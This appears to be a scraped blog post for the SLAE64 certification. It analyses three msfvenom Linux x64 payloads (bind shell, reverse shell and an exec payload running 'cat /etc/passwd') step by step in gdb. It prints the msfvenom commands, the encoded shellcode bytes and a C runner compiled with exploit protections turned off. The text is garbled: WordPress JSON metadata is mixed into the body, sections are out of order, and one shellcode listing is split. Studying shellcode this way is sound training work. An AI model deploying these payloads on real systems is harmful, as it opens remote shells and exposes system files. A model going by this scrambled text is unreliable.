Student-ID: PA-15847<\/strong><\/p>\n\n\n\n The Objectives for the Assignment:<\/p>\n\n\n\n – I chose the following shellcode from msfvenom:<\/p>\n\n\n\n For linux\/x64\/shell_bind_tcp<\/strong>, I created the shellcode:<\/p>\n\n\n\n msfvenom -p linux\/x64\/shell_bind_tcp -f c -b “\\x00”<\/p>\n\n\n\n Put the shellcode in our generic shellcode.c file and compile it:<\/p>\n\n\n\n Compile the file:<\/p>\n\n\n\n gcc -fno-stack-protector -z execstack shellcode.c -o shellcode<\/strong><\/p>\n\n\n\n Now we can start analyzing with the gdb:<\/p>\n\n\n\n gdb -q .\/shellcode -tui<\/strong><\/p>\n\n\n\n As always, we write the following commands in gdb:<\/p>\n\n\n\n (gdb) set disassembly-flavor intel That’s what we see in the beginning when we hit the breakpoint<\/p>\n\n\n\n Continue hitting stepi until the loop is over<\/p>\n\n\n\n Observe how we go through each syscalls as we wrote before in the previous assignments for bind shellcode (socket, bind, listen etc.)<\/p>\n\n\n\n For instance here we go through accept syscall (0x2b –> 43:syscall accept) <\/p>\n\n\n\n When we hit the last syscall, check on the port 4444 for a bind shell<\/p>\n\n\n\n Very straightforward. \ud83d\ude42<\/p>\n\n\n\n Now let’s have a look at the next shellcode for linux\/x64\/shell_reverse_tcp:<\/p>\n\n\n\n Let’s create the shellcode first:<\/p>\n\n\n\n msfvenom -p linux\/x64\/shell_reverse_tcp lhost=127.0.0.1 -f c -b “\\x00”<\/p>\n\n\n\n <\/p>\n\n\n\n Put the shellcode in our generic shellcode.c file and compile it:<\/p>\n\n\n\n Compile the file Now we can start analyzing with the gdb:<\/p>\n\n\n\n As always, we write the following commands in gdb:<\/p>\n\n\n\n (gdb) set disassembly-flavor intel That’s what we see in the beginning when we hit the breakpoint<\/p>\n\n\n\n We’ll see the following syscalls while we’re debugging the code and stepi’ing each line:<\/p>\n\n\n\n For instance here, we see 42:syscall connect<\/p>\n\n\n\n We continue with stepi until we go through each syscall and get a reverse shell at the end:<\/p>\n\n\n\n The last shellcode we’ll analyze is linux\/x64\/exec<\/strong><\/p>\n\n\n\n We’ll create the shellcode with the following command:<\/p>\n\n\n\n msfvenom -p linux\/x64\/exec<\/strong> CMD=”cat \/etc\/\/passwd” -f c -b “\\x00”<\/p>\n\n\n\n “\\x48\\x31\\xc9\\x48\\x81\\xe9\\xf9\\xff\\xff\\xff\\x48\\x8d\\x05\\xef\\xff” Again we go through the same steps as we did for the previous shellcodes to compile and run it with GDB TUI option:<\/p>\n\n\n\n Again we start with the same setup:<\/p>\n\n\n\n First we go through the decoder stub and go through the loop<\/p>\n\n\n\n Let’s see the registers when we hit the first syscall<\/p>\n\n\n\n When we step in the syscall, \/etc\/passwd file content will return<\/p>\n\n\n\n This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: https:\/\/www.pentesteracademy.com\/course?id=7 Student-ID: PA-15847 The Objectives for the Assignment: – Take up at least 3 shellcode samples created using msfpayload for linux x86- use gdb to dissect the functionality of the shellcode- document your analysis I chose the following… Continue reading SLAE64: Assignment 5: Shellcode Analysis<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[20],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/141"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=141"}],"version-history":[{"count":2,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/141\/revisions"}],"predecessor-version":[{"id":162,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/141\/revisions\/162"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=141"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=141"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=141"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}Take up at least 3 shellcode samples created using msfpayload for linux x86
- use gdb to dissect the functionality of the shellcode
- document your analysis<\/code><\/strong><\/p>\n\n\n\n\"\\x48\\x31\\xc9\\x48\\x81\\xe9\\xf5\\xff\\xff\\xff\\x48\\x8d\\x05\\xef\\xff\"\n\"\\xff\\xff\\x48\\xbb\\x62\\x5a\\x73\\xd6\\xc2\\x9b\\x6b\\x02\\x48\\x31\\x58\"\n\"\\x27\\x48\\x2d\\xf8\\xff\\xff\\xff\\xe2\\xf4\\x08\\x73\\x2b\\x4f\\xa8\\x99\"\n\"\\x34\\x68\\x63\\x04\\x7c\\xd3\\x8a\\x0c\\x39\\xc5\\x66\\x7e\\x71\\xd6\\xd3\"\n\"\\xc7\\x23\\x8b\\x84\\x30\\x63\\x8c\\xa8\\xaa\\x33\\x0d\\x67\\x30\\x41\\x8e\"\n\"\\xcd\\x9e\\x23\\x33\\x94\\x30\\x58\\x8e\\xcd\\x9e\\x23\\x95\\x08\\x59\\x2d\"\n\"\\x9e\\x3d\\x55\\x01\\x23\\x3a\\x55\\x76\\xa3\\x34\\xf1\\x50\\x5a\\xfb\\x12\"\n\"\\xc8\\xf9\\xa0\\xf2\\x05\\x2d\\x11\\x32\\x73\\x85\\x8a\\x12\\x8c\\x50\\x35\"\n\"\\x12\\xfa\\x30\\xcd\\x9e\\x6b\\x02\";<\/strong><\/code>\n<\/pre>\n\n\n\n#include<stdio.h>\n#include<string.h>\n\nunsigned char code[] = \"\";\n\nmain()\n{\n\tprintf(\"Shellcode Length: %d\\n\", (int)strlen(code));\n\tint (*ret)() = (int(*)())code;\n\tret();\n}<\/strong><\/code><\/pre>\n\n\n\n
(gdb) break *&code
(gdb) run
(gdb) layout asm
(gdb) layout regs
(gdb) stepi<\/p>\n\n\n\n![\"\"](\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2021\/10\/Screenshot-2021-10-10-at-19.52.50-1024x629.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2021\/10\/Screenshot-2021-10-10-at-19.57.11-1024x463.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2021\/10\/Screenshot-2021-10-10-at-19.59.18.png\")
<\/figure>\n\n\n\n\"\\x48\\x31\\xc9\\x48\\x81\\xe9\\xf6\\xff\\xff\\xff\\x48\\x8d\\x05\\xef\\xff\"
\"\\xff\\xff\\x48\\xbb\\xbe\\xdc\\x7d\\x8c\\xe8\\x08\\xc2\\xc6\\x48\\x31\\x58\"
\"\\x27\\x48\\x2d\\xf8\\xff\\xff\\xff\\xe2\\xf4\\xd4\\xf5\\x25\\x15\\x82\\x0a\"
\"\\x9d\\xac\\xbf\\x82\\x72\\x89\\xa0\\x9f\\x8a\\x7f\\xbc\\xdc\\x6c\\xd0\\x97\"
\"\\x08\\xc2\\xc7\\xef\\x94\\xf4\\x6a\\x82\\x18\\x98\\xac\\x94\\x84\\x72\\x89\"
\"\\x82\\x0b\\x9c\\x8e\\x41\\x12\\x17\\xad\\xb0\\x07\\xc7\\xb3\\x48\\xb6\\x46\"
\"\\xd4\\x71\\x40\\x79\\xe9\\xdc\\xb5\\x13\\xa3\\x9b\\x60\\xc2\\x95\\xf6\\x55\"
\"\\x9a\\xde\\xbf\\x40\\x4b\\x20\\xb1\\xd9\\x7d\\x8c\\xe8\\x08\\xc2\\xc6\";<\/strong><\/code><\/p>\n\n\n\n#include<stdio.h>
#include<string.h>
unsigned char code[] = \"\";
main()
{
\tprintf(\"Shellcode Length: %d\\n\", (int)strlen(code));
\tint (*ret)() = (int(*)())code;
\tret();
}<\/strong><\/code><\/pre>\n\n\n\ngcc -fno-stack-protector -z execstack shellcode.c -o shellcode<\/strong><\/code><\/p>\n\n\n\ngdb -q .\/shellcode -tui<\/strong><\/code><\/p>\n\n\n\n
(gdb) break *&code
(gdb) run
(gdb) layout asm
(gdb) layout regs
(gdb) stepi<\/p>\n\n\n\nsyscall socket
syscall connect
syscall read
syscall dup2
syscall execve
syscall close<\/code><\/strong><\/p>\n\n\n\n![\"\"](\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2021\/10\/Screenshot-2021-10-10-at-20.08.04-1024x640.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2021\/10\/Screenshot-2021-10-10-at-20.10.03.png\")
<\/figure>\n\n\n\n
“\\xff\\xff\\x48\\xbb\\xbe\\xcd\\x47\\x27\\x02\\x12\\xf0\\x80\\x48\\x31\\x58”
“\\x27\\x48\\x2d\\xf8\\xff\\xff\\xff\\xe2\\xf4\\xd4\\xf6\\x1f\\xbe\\x4a\\xa9”
“\\xdf\\xe2\\xd7\\xa3\\x68\\x54\\x6a\\x12\\xa3\\xc8\\x37\\x2a\\x2f\\x0a\\x61”
“\\x12\\xf0\\xc8\\x37\\x2b\\x15\\xcf\\x13\\x12\\xf0\\x80\\xdd\\xac\\x33\\x07”
“\\x2d\\x77\\x84\\xe3\\x91\\xe2\\x37\\x46\\x71\\x61\\x87\\xe4\\xbe\\x9b\\x10”
“\\x6f\\x8b\\xf4\\xff\\x85”;<\/p>\n\n\n\n![\"\"](\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2021\/10\/Screenshot-2021-10-10-at-20.15.23-1024x554.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2021\/10\/Screenshot-2021-10-10-at-20.17.08-1024x361.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2021\/10\/Screenshot-2021-10-10-at-20.18.15-1024x312.png\")
<\/figure>\n","protected":false},"excerpt":{"rendered":"